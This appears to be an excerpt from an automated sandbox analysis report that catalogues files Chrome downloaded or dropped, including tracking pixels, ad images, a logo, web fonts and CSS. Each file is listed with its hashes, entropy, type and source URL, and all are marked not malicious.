                                                                                                                                                                                                                                                                                                                      MD5:BF617F12941218EF6760C7095AE6C272
                                                                                                                                                                                                                                                                                                                      SHA1:77475E56D2F3CD42FD9F4E301C19E76D956BC10C
                                                                                                                                                                                                                                                                                                                      SHA-256:FBC53DC6D95EAA36041E47CE430910A98F5E393BD671436B7685C7CF361226AC
                                                                                                                                                                                                                                                                                                                      SHA-512:F6C7FBCF07EEE8AB7ED9BC1FFA5460E9B9EEB2DB11591553CE1C754B8A1A96021D82FFAAA6BD658406D30DD2B4DE9FD305A8565970033C24B273B48192BB9AC4
                                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                                                                                                      URL:https://tpc.googlesyndication.com/simgad/11778604948800383788?sqp=4sqPyQQ7QjkqNxABHQAAtEIgASgBMAk4A0DwkwlYAWBfcAKAAQGIAQGdAQAAgD-oAQGwAYCt4gS4AV_FAS2ynT4&rs=AOga4qkAaLVHOOPz_bastxbvDcE70OBe7Q
                                                                                                                                                                                                                                                                                                                      Preview:.PNG........IHDR.............N#N6....PLTEv.4.....L...TTT&&&.........'''SSS..RRR...w.5......u.3v.2v.5........x.4.....x......:::.........Q.....................nnn***...xxx...!!!..............................XXX............sss.....i..{...ccc...............4....8{{{..................q...............^^^HHHJJJ.....`.........```..................|.?..Y..L..........x.9........kkk222PPP...........hhh..E......UUV......EEEMNN..............7.............5........AAA....A....A......v.4.......Y.+.......>.h.3....%.....===........=666...........V....:w.2......-....p...7.K......................_.k....g....).E.G......K......y.5.~..\[[.2..7.>........-........+..b...%SVP.`.......{.P...u....l....r......QTg.......M.......^UK........i..cA@?%......zTXtRaw profile type APP1....ePI..0....}..,}.iST.....8u..F.=...$.Z.u[..=..V.......1%0.,3.)8.E.D.....~..#.R../..1u.(G.....'U8A......`A.V.2q&`d6.9....|....Q.....:....fGx...Hg4q.
                                                                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                      File Type:PNG image data, 1 x 1, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                                      Size (bytes):170
                                                                                                                                                                                                                                                                                                                      Entropy (8bit):5.335916817166796
                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                      SSDEEP:3:yionv//thPlE+tnM5OCAadCmy42/uDlhlbGlo+4/iRXTECLrlxyxtyaC/tIlsg1B:6v/lhPfZMQC19s/6TdKXTECL6yR/iVB
                                                                                                                                                                                                                                                                                                                      MD5:E7673C60AF825466F83D46DA72CA1635
                                                                                                                                                                                                                                                                                                                      SHA1:FC0FCBEE0835709BA2D28798A612BFD687903FB5
                                                                                                                                                                                                                                                                                                                      SHA-256:0B8A20373C6DD04E091902226D922B3688143A8938AFB9D283D889DE7B55CEB5
                                                                                                                                                                                                                                                                                                                      SHA-512:F1C33E72643CE366FD578E3B5D393799E8C9EA27B180987826AF43B4FC00B65A4EAAE5E6426A23448956FEE99E3108C6A86F32FB4896C156E24AF0571A11C498
                                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                                                                                                      Preview:.PNG........IHDR....................bKGD..............pHYs.................tIME......-Q.7n....tEXtComment.Created with The GIMP.d%n....IDAT..c.iy......+........IEND.B`..
                                                                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                      File Type:PNG image data, 1 x 1, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                                      Size (bytes):170
                                                                                                                                                                                                                                                                                                                      Entropy (8bit):5.335916817166796
                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                      SSDEEP:3:yionv//thPlE+tnM5OCAadCmy42/uDlhlbGlo+4/iRXTECLrlxyxtyaC/tIlsg1B:6v/lhPfZMQC19s/6TdKXTECL6yR/iVB
                                                                                                                                                                                                                                                                                                                      MD5:E7673C60AF825466F83D46DA72CA1635
                                                                                                                                                                                                                                                                                                                      SHA1:FC0FCBEE0835709BA2D28798A612BFD687903FB5
                                                                                                                                                                                                                                                                                                                      SHA-256:0B8A20373C6DD04E091902226D922B3688143A8938AFB9D283D889DE7B55CEB5
                                                                                                                                                                                                                                                                                                                      SHA-512:F1C33E72643CE366FD578E3B5D393799E8C9EA27B180987826AF43B4FC00B65A4EAAE5E6426A23448956FEE99E3108C6A86F32FB4896C156E24AF0571A11C498
                                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                                                                                                      Preview:.PNG........IHDR....................bKGD..............pHYs.................tIME......-Q.7n....tEXtComment.Created with The GIMP.d%n....IDAT..c.iy......+........IEND.B`..
                                                                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                      File Type:PNG image data, 1 x 1, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                                      Size (bytes):170
                                                                                                                                                                                                                                                                                                                      Entropy (8bit):5.335916817166796
                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                      SSDEEP:3:yionv//thPlE+tnM5OCAadCmy42/uDlhlbGlo+4/iRXTECLrlxyxtyaC/tIlsg1B:6v/lhPfZMQC19s/6TdKXTECL6yR/iVB
                                                                                                                                                                                                                                                                                                                      MD5:E7673C60AF825466F83D46DA72CA1635
                                                                                                                                                                                                                                                                                                                      SHA1:FC0FCBEE0835709BA2D28798A612BFD687903FB5
                                                                                                                                                                                                                                                                                                                      SHA-256:0B8A20373C6DD04E091902226D922B3688143A8938AFB9D283D889DE7B55CEB5
                                                                                                                                                                                                                                                                                                                      SHA-512:F1C33E72643CE366FD578E3B5D393799E8C9EA27B180987826AF43B4FC00B65A4EAAE5E6426A23448956FEE99E3108C6A86F32FB4896C156E24AF0571A11C498
                                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                                                                                                      Preview:.PNG........IHDR....................bKGD..............pHYs.................tIME......-Q.7n....tEXtComment.Created with The GIMP.d%n....IDAT..c.iy......+........IEND.B`..
                                                                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                      File Type:GIF image data, version 89a, 1 x 1
                                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                                      Size (bytes):42
                                                                                                                                                                                                                                                                                                                      Entropy (8bit):2.9881439641616536
                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                      SSDEEP:3:CUXPQE/xlEy:1QEoy
                                                                                                                                                                                                                                                                                                                      MD5:D89746888DA2D9510B64A9F031EAECD5
                                                                                                                                                                                                                                                                                                                      SHA1:D5FCEB6532643D0D84FFE09C40C481ECDF59E15A
                                                                                                                                                                                                                                                                                                                      SHA-256:EF1955AE757C8B966C83248350331BD3A30F658CED11F387F8EBF05AB3368629
                                                                                                                                                                                                                                                                                                                      SHA-512:D5DA26B5D496EDB0221DF1A4057A8B0285D15592A8F8DC7016A294DF37ED335F3FDE6A2252962E0DF38B62847F8B771463A0124EF3F84299F262ED9D9D3CEE4C
                                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                                                                                                      Preview:GIF89a.............!.......,...........D.;
                                                                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                      File Type:PNG image data, 1 x 1, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                                                                                                                      Size (bytes):170
                                                                                                                                                                                                                                                                                                                      Entropy (8bit):5.335916817166796
                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                      SSDEEP:3:yionv//thPlE+tnM5OCAadCmy42/uDlhlbGlo+4/iRXTECLrlxyxtyaC/tIlsg1B:6v/lhPfZMQC19s/6TdKXTECL6yR/iVB
                                                                                                                                                                                                                                                                                                                      MD5:E7673C60AF825466F83D46DA72CA1635
                                                                                                                                                                                                                                                                                                                      SHA1:FC0FCBEE0835709BA2D28798A612BFD687903FB5
                                                                                                                                                                                                                                                                                                                      SHA-256:0B8A20373C6DD04E091902226D922B3688143A8938AFB9D283D889DE7B55CEB5
                                                                                                                                                                                                                                                                                                                      SHA-512:F1C33E72643CE366FD578E3B5D393799E8C9EA27B180987826AF43B4FC00B65A4EAAE5E6426A23448956FEE99E3108C6A86F32FB4896C156E24AF0571A11C498
                                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                                                                                                      URL:https://cm.g.doubleclick.net/pixel?google_nid=adelphic_mobile&google_gid=CAESEFdi1-RiPfWOI2CLRzbOGh8&google_cver=1&google_push=AXcoOmRs--NX_amzQoFfaVNg5QoiiG0PbKRUiH2xlJkIPOhaYBZjwU9VO-TZql-FDrFlnoZ8M75CK8ZQ9kFGCZP5OX1boLe0fbMXAQ&google_hm=kkabdqbbSw6jVFe-wq1F4Q==
                                                                                                                                                                                                                                                                                                                      Preview:.PNG........IHDR....................bKGD..............pHYs.................tIME......-Q.7n....tEXtComment.Created with The GIMP.d%n....IDAT..c.iy......+........IEND.B`..
                                                                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                      File Type:PNG image data, 1 x 1, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                                                                                                                      Size (bytes):170
                                                                                                                                                                                                                                                                                                                      Entropy (8bit):5.335916817166796
                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                      SSDEEP:3:yionv//thPlE+tnM5OCAadCmy42/uDlhlbGlo+4/iRXTECLrlxyxtyaC/tIlsg1B:6v/lhPfZMQC19s/6TdKXTECL6yR/iVB
                                                                                                                                                                                                                                                                                                                      MD5:E7673C60AF825466F83D46DA72CA1635
                                                                                                                                                                                                                                                                                                                      SHA1:FC0FCBEE0835709BA2D28798A612BFD687903FB5
                                                                                                                                                                                                                                                                                                                      SHA-256:0B8A20373C6DD04E091902226D922B3688143A8938AFB9D283D889DE7B55CEB5
                                                                                                                                                                                                                                                                                                                      SHA-512:F1C33E72643CE366FD578E3B5D393799E8C9EA27B180987826AF43B4FC00B65A4EAAE5E6426A23448956FEE99E3108C6A86F32FB4896C156E24AF0571A11C498
                                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                                                                                                      URL:https://cm.g.doubleclick.net/pixel?google_nid=kadam&google_push=AXcoOmQJjBajovnqSJhcnjB8OznNBMIfG7StGCCKjvywNcFSn6R5uJC5Ake0ACufry6wJvOvysfECv7eIsLmnMa4auWPPgivRfRT0PA
                                                                                                                                                                                                                                                                                                                      Preview:.PNG........IHDR....................bKGD..............pHYs.................tIME......-Q.7n....tEXtComment.Created with The GIMP.d%n....IDAT..c.iy......+........IEND.B`..
                                                                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                      File Type:PNG image data, 1 x 1, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                                      Size (bytes):170
                                                                                                                                                                                                                                                                                                                      Entropy (8bit):5.335916817166796
                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                      SSDEEP:3:yionv//thPlE+tnM5OCAadCmy42/uDlhlbGlo+4/iRXTECLrlxyxtyaC/tIlsg1B:6v/lhPfZMQC19s/6TdKXTECL6yR/iVB
                                                                                                                                                                                                                                                                                                                      MD5:E7673C60AF825466F83D46DA72CA1635
                                                                                                                                                                                                                                                                                                                      SHA1:FC0FCBEE0835709BA2D28798A612BFD687903FB5
                                                                                                                                                                                                                                                                                                                      SHA-256:0B8A20373C6DD04E091902226D922B3688143A8938AFB9D283D889DE7B55CEB5
                                                                                                                                                                                                                                                                                                                      SHA-512:F1C33E72643CE366FD578E3B5D393799E8C9EA27B180987826AF43B4FC00B65A4EAAE5E6426A23448956FEE99E3108C6A86F32FB4896C156E24AF0571A11C498
                                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                                                                                                      Preview:.PNG........IHDR....................bKGD..............pHYs.................tIME......-Q.7n....tEXtComment.Created with The GIMP.d%n....IDAT..c.iy......+........IEND.B`..
                                                                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                      File Type:PNG image data, 600 x 314, 8-bit colormap, non-interlaced
                                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                                      Size (bytes):3360
                                                                                                                                                                                                                                                                                                                      Entropy (8bit):7.6743461321785915
                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                      SSDEEP:96:4JFCnqNZnERobhNaSgjXxFF14fCOLfcNCV8J1D1:sCqbnS4Nkt1BAFVWf
                                                                                                                                                                                                                                                                                                                      MD5:406843D17B7D22C28CCD59A5D4F2C8F2
                                                                                                                                                                                                                                                                                                                      SHA1:664B0283F3C8FF53F568992C9C4168A687C6FF23
                                                                                                                                                                                                                                                                                                                      SHA-256:9E4848C58442739631BAC6B708A30BD9A7F642C6BAAB8172D608B1403EACC482
                                                                                                                                                                                                                                                                                                                      SHA-512:4A2671F00DF1913237FF728CF6147FFC2DE03FB1E1B7E20555B7F7A461775B48D919E47B44D5FE03EED5AF4BB5B6A7D85D02EDAF460F23F0452BF43B0AF0CF8F
                                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                                                                                                      Preview:.PNG........IHDR...X...:......l."....PLTE....p..o.....o...........(o.W..r..p........u..m....5.........q......./z.....X.....s..k..k..m..c..I..i..L..r..i..V.....e..X..u..v....o..._..p..]..........8s....t....{......S....$\.....d....d....2h....Q..A.....T...]..Ly.0j..*..{..H.?..i....|.....9.g..]..@{.j......E..Y.I....IDATx....[....am. a."aH..a...RHB.RHIJ.6.v...#..`dlC..>7).5..~3.K.0......................................................................................................................g.>i.._cM....A`.;e.0...*#..[.2.E<.....F...`!..........-.....a...;.\>,..<.+...h..]c.|c.....V?...OG....sjW.|g,...O..{W.o7..:..Fn,..{.h.qZ>.....M....,.u.o.#...e.............F3.J.t...f..........zTb?.|...q..;q{2...V.....:..........5...nX...T..7A=.f...fm3.Q.Z.mY..?...rE.....-...d$G..05.v........Z..nxsSu..omyV..`....}h..p...(.......#.to_8.6.......?.......v..*nm?v.....92..<>2,7..S.,.S.=..y......O\.1CO....7..L.d@V..{.8.......T.\.T{..g.ui.)M.%........{..-x.
                                                                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                      File Type:PNG image data, 1200 x 1200, 8-bit colormap, non-interlaced
                                                                                                                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                                                                                                                      Size (bytes):6633
                                                                                                                                                                                                                                                                                                                      Entropy (8bit):6.943099581411173
                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                      SSDEEP:96:YEjw2sjYKw1WIL2KMLgIk6AtTxgA6/e46arFDRlgj2P6uXfi1yMjCFEiHA:XsjUIC0N0Zox6WFDRGj2P66eTiHA
                                                                                                                                                                                                                                                                                                                      MD5:E78B7BD4E07BFD2389ECB0C9BAF2D9C4
                                                                                                                                                                                                                                                                                                                      SHA1:6EB12C9E3555267C211970C13B81C83718E0ABDE
                                                                                                                                                                                                                                                                                                                      SHA-256:E4EF38A672DA0D57953164EE7D4BFD38E1C26789432C0A82B365AB16966CDAEB
                                                                                                                                                                                                                                                                                                                      SHA-512:E175747221715C2F9F72F630BE044C836BE1D3063F8CF712BA6403BD4173BCDE7ED0950834F10BA46CEB8FC8E9ACDFE55620DC0A9C8376E274F9DF59E99E6949
                                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                                                                                                      URL:https://upload.wikimedia.org/wikipedia/commons/thumb/7/7d/Microsoft_.NET_logo.svg/1200px-Microsoft_.NET_logo.svg.png
                                                                                                                                                                                                                                                                                                                      Preview:.PNG........IHDR...............C.....gAMA......a.... cHRM..z&..............u0...`..:....p..Q<....PLTEQ+..........xZ...]:.cA....r....T/......hG.......]9...y\..........iH....R,.w...._<......~b....V2......mM.....{....`=....d..........nN.............i....Y4......rS....S-......cA...l....Y5......sU.........n.....|......gF....n....[7.........p......k.R-.......^;...._<.lL.vX.d..........}.U0..............eC.....T..j......Z6....rT...i..........a?.........V1....tU....{^.....................eD.......pP....W2.}`.....s.....x..jI.tV.......X3.h...a>.....~....kK..........wY...[7.....o...nO.b@......oP.|_...u..pQ.f....\8......uW....lK...r.....|...w.fE...qR.....g...jJ........{_.....t.....z...........wZ.q.........y.......hF....y[.}a....z].dB..L`....bKGD.f.|d....tIME......)-u......IDATx......u...gHRn.I..A@QT.%....$...jec.(...h."..x#...eu]tM1W..M.T.....,[..2..l.u....5.pD.{:....}>..|...y...3.=gR.........
                                                                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                      File Type:Web Open Font Format (Version 2), TrueType, length 48236, version 1.0
                                                                                                                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                                                                                                                      Size (bytes):48236
                                                                                                                                                                                                                                                                                                                      Entropy (8bit):7.994912604882335
                                                                                                                                                                                                                                                                                                                      Encrypted:true
                                                                                                                                                                                                                                                                                                                      SSDEEP:768:uj6JxavgLx5rjTH3CdZ3y11o4uMb2IVEhiB6z6GAAHJApICtBgso6HaOjTXHRWK:ujoa4LxZPCdm3B2IVEhiB62apApISxos
                                                                                                                                                                                                                                                                                                                      MD5:015C126A3520C9A8F6A27979D0266E96
                                                                                                                                                                                                                                                                                                                      SHA1:2ACF956561D44434A6D84204670CF849D3215D5F
                                                                                                                                                                                                                                                                                                                      SHA-256:3C4D6A1421C7DDB7E404521FE8C4CD5BE5AF446D7689CD880BE26612EAAD3CFA
                                                                                                                                                                                                                                                                                                                      SHA-512:02A20F2788BB1C3B2C7D3142C664CDEC306B6BA5366E57E33C008EDB3EB78638B98DC03CDF932A9DC440DED7827956F99117E7A3A4D55ACADD29B006032D9C5C
                                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                                                                                                      URL:https://fonts.gstatic.com/s/opensans/v40/memvYaGs126MiZpBA-UvWbX2vVnXBbObj2OVTS-muw.woff2
                                                                                                                                                                                                                                                                                                                      Preview:wOF2.......l......D...............................O..B..h?HVAR.x.`?STAT.$'...0+...|.../V........+..2.0..6.6.$..`. ..~......[B4q.....t..P.M_.z...1..R.S*...u.#..R....fR.1.N.v.N.P...;.2........!Z......Qs...5f.G.K.an2&....2...*......C.H.t..N!.....nh.<(.vN.....j.._.L.P.t..Ai.%.............._I.i,..o,C.].H.X9.....a.=N....k.....n.L..k.f.u..{...:.}^\[..~5...Z`...........`!...%4..,...K0..&.a/....P....S....m.Z......u...D.j.F...f.0`I.`.`.h#..)(FQ.F!o$........S.).MV8%Rh...r...x...T]$.=......Y...!.3.&U..."....Q....{.l/0..d..4iJ/..}...3....i[Z..NG.WD...>.[U..Q.h..@m.=..S...1C2...d...<..v.?.q.f..n...OUz.....&Z......Z."..N.....n...9.B..C..W....}...W..6Zs.i.+Z........jB.n..x.8M.....q..@I....-.%..,C,..K..#.2...4)/.v_..x.<....t.....%[.4?.=j.V..jj''..W.u..q....I.L.=......E...\.M.7{.>......W........C.`...,9$......\..o........y...4A..m.P.,X..=?.:................wF`..+.P..........M!.4.......l.>M..t.ff5r..^..Z.g...!fA,hIIQ...e.R>B.AH.VuX..>..\.=.ky...1>C....>C.c.;...6D.
                                                                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                      File Type:PNG image data, 727 x 380, 8-bit colormap, non-interlaced
                                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                                      Size (bytes):11489
                                                                                                                                                                                                                                                                                                                      Entropy (8bit):7.928741117538931
                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                      SSDEEP:192:KVKggNVkMIW1fprYVczzz5jknVAAi1fTbg1fV8shSsmdYI6TbmvkvxD:sMVkMJxfzf5InVniiThTcOxD
                                                                                                                                                                                                                                                                                                                      MD5:4A3A02542BBD6D260AFD680F4EB9F0CE
                                                                                                                                                                                                                                                                                                                      SHA1:C368D3DCA48E4821725DBA39220ABF4D388BB519
                                                                                                                                                                                                                                                                                                                      SHA-256:55B64C16025EA72D28B1023DA02FBCD12A1ED0B97D60E39E6BFEF15B506758FD
                                                                                                                                                                                                                                                                                                                      SHA-512:2FC2CE8CA52EC44E4B2B8151C6CA5F71732E9EBD02B6546D47F3F9F43D387DB3E4C2EAACCA6EE74551C21A01D172425E0D97D1A250B52C77C3492DD83A1BAAF6
                                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                                                                                                      Preview:.PNG........IHDR.......|.....3cg....uPLTE3.&..........x...V.K...}.t.......^.T.............v.m=.0..........E.9S.HI.=\.Qo.f.........i.`...........X...`zTXtRaw profile type APP1..X..[.$..E.{...=..rHQ2.0lc.........0....]......................._._..}.o.....,YEy3...K......yWx3...o_s$.t.......3z.y..9 ..q..mk.RL..X>R....._.JR.3.....O]..Zg.=.\{].U......^.|&..&.]..H....^2.....e.0N..q....>..r....'...?.|..{.s@T:......>.:f..<......:.. e._7...v....+..O.=.<.+Ys{.M..|r^.y.<J)RJ>E8.p.|.$..:....;...a,....wGyr.F.>((.c.R.1~s.............'V2......".;..1BE.,....|..[....&B._5.JL..U.....&..rn._..J.g.....2...P...K^...5...g....*..3....>.......+9.1/fW.w..V.0..k....0f..*.O.3.W....vX.JX.J..>z?..6gP:..mV..6S.*.5goP...d...!.}..U..m.[...w....;....t..)..!> .q..~N....Pk.l.....%..5..c..GsmG....V+....{q......o..W.I.Vt,tEu...cio\...........6....V..L.^vY..K.4....N...d.S..~.0)X..D.v...W&-......?.GG[.....U..h.$?.......^.r.L6@u..u.j=s.}Fe....K..&..n^u.`...
                                                                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                      File Type:ASCII text, with very long lines (1572)
                                                                                                                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                                                                                                                      Size (bytes):47988
                                                                                                                                                                                                                                                                                                                      Entropy (8bit):5.336036748275791
                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                      SSDEEP:384:f0aOClrtSZvbqY490nVg3Of0wt32vSqY49NnSzdOhqqt5Iv0qY49HnQd+OWJ3tW9:eHjMuOA8IgbXdUw/rVfQy
                                                                                                                                                                                                                                                                                                                      MD5:A729431A3D4C5F20E23870661D5DB434
                                                                                                                                                                                                                                                                                                                      SHA1:ADCCCD8FFAC2C671B790463918E59AB652CDBC6C
                                                                                                                                                                                                                                                                                                                      SHA-256:3ACC25211C6A9576E42AFCC0AEA1BDA7431D716D31D92B0B800293276BCABC9E
                                                                                                                                                                                                                                                                                                                      SHA-512:173DDEB1ECBF38AB4E384078E188B459C88FE5DB1D4D4EE1AC0C0635AC9CC298B290F7DE417F8D534DCFABED3D3C87868BEB37B7600028718D517A6FC299FEC5
                                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                                                                                                      URL:"https://fonts.googleapis.com/css?family=Baloo+Paaji|Open+Sans:300,300i,400,400i,600,600i,700,700i"
                                                                                                                                                                                                                                                                                                                      Preview:/* gurmukhi */.@font-face {. font-family: 'Baloo Paaji';. font-style: normal;. font-weight: 400;. src: url(https://fonts.gstatic.com/s/baloopaaji/v21/8AttGsyxM5KQQU-Y4MTwVan3qRrgBg.woff2) format('woff2');. unicode-range: U+0951-0952, U+0964-0965, U+0A01-0A76, U+200C-200D, U+20B9, U+25CC, U+262C, U+A830-A839;.}./* vietnamese */.@font-face {. font-family: 'Baloo Paaji';. font-style: normal;. font-weight: 400;. src: url(https://fonts.gstatic.com/s/baloopaaji/v21/8AttGsyxM5KQQU-Y4MTwVanbqRrgBg.woff2) format('woff2');. unicode-range: U+0102-0103, U+0110-0111, U+0128-0129, U+0168-0169, U+01A0-01A1, U+01AF-01B0, U+0300-0301, U+0303-0304, U+0308-0309, U+0323, U+0329, U+1EA0-1EF9, U+20AB;.}./* latin-ext */.@font-face {. font-family: 'Baloo Paaji';. font-style: normal;. font-weight: 400;. src: url(https://fonts.gstatic.com/s/baloopaaji/v21/8AttGsyxM5KQQU-Y4MTwVanaqRrgBg.woff2) format('woff2');. unicode-range: U+0100-02BA, U+02BD-02C5, U+02C7-02CC, U+02CE-02D7, U+02DD-02FF, U+0304,
                                                                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                      File Type:PNG image data, 1200 x 628, 8-bit colormap, non-interlaced
                                                                                                                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                                                                                                                      Size (bytes):41970
                                                                                                                                                                                                                                                                                                                      Entropy (8bit):7.952243493903504
                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                      SSDEEP:768:QYRIdacymFQ0cVzWw5DN81+yV7OHML2fWcOKmJgF7QvIeySrCk/8t3f+qZ4C:lGOmFQ0ch5DNq7OHVOyv8PHWEI3f74C
                                                                                                                                                                                                                                                                                                                      MD5:E9681E558391DD7368AC7E0828FFFE77
                                                                                                                                                                                                                                                                                                                      SHA1:A0B030B8914A2DA1F155DB53EFEF5E56EC348148
                                                                                                                                                                                                                                                                                                                      SHA-256:A57F6E4555D516B7A1BFF5D1EE889728561AD2E4D5275B50A462914315DD9CF5
                                                                                                                                                                                                                                                                                                                      SHA-512:BEBFDA119694BA8AEA8A9177C664C78399C94995CBDB33E610B562DC29B19176E30AE0F6F24DD4E7837D16369F1A608C6672EB506A7877B3BDB575C59EEBA9FA
                                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                                                                                                      URL:https://tpc.googlesyndication.com/simgad/8815001114601639138/14763004658117789537
                                                                                                                                                                                                                                                                                                                      Preview:.PNG........IHDR.......t.....5V*e....PLTE.....*..)..'..*........+.........&.....%....~'.y...<........x#...n..t....\....L..dD.z%.q..s%....S....d .L..y'.wZ.x..f...t.c ..........t$.K$....m#.F(..{......Z..Q...S.U.....c..q"......D........g!.s#..`..P.T..@......A..p..i=.H..R.._......z......G..W..o.]".J".K....^.....\..A..=......S..f.....D..h..I.b.....{..^.rP.~.f...~<.vK.mB.d.U>.Z/.Q#.z.mB.d$..]..o.n=.{J.=..l.<..s`.^8..o.p..v.O0..m.sZ.`C.WB.U(.m0.J-.H6.pW..eA.M....eW.3.......\-....}v...3..:..gW.,......... .IDATx......^8..@7|..`... ."C;.h.d(..$mY$-Q.EJ.......&..,.....x.4..f.<.2..s........Q<...$....}...L.D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H
                                                                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                      File Type:HTML document, ASCII text, with very long lines (65536), with no line terminators
                                                                                                                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                                                                                                                      Size (bytes):233666
                                                                                                                                                                                                                                                                                                                      Entropy (8bit):6.224373448960184
                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                      SSDEEP:3072:BjaLzNLZS2FSV3dwvBC1yIyvyITLOIL/aai6gpZlwyRya+/WCbppZlGyPhy+:Bj2zNM2FSrwvBC1hKzuJwGipJGghx
                                                                                                                                                                                                                                                                                                                      MD5:311162A2769F467D9B25B925DFC7B5AF
                                                                                                                                                                                                                                                                                                                      SHA1:A7BF288CDE1FCF0EE0454EE1D9F7E990E178787F
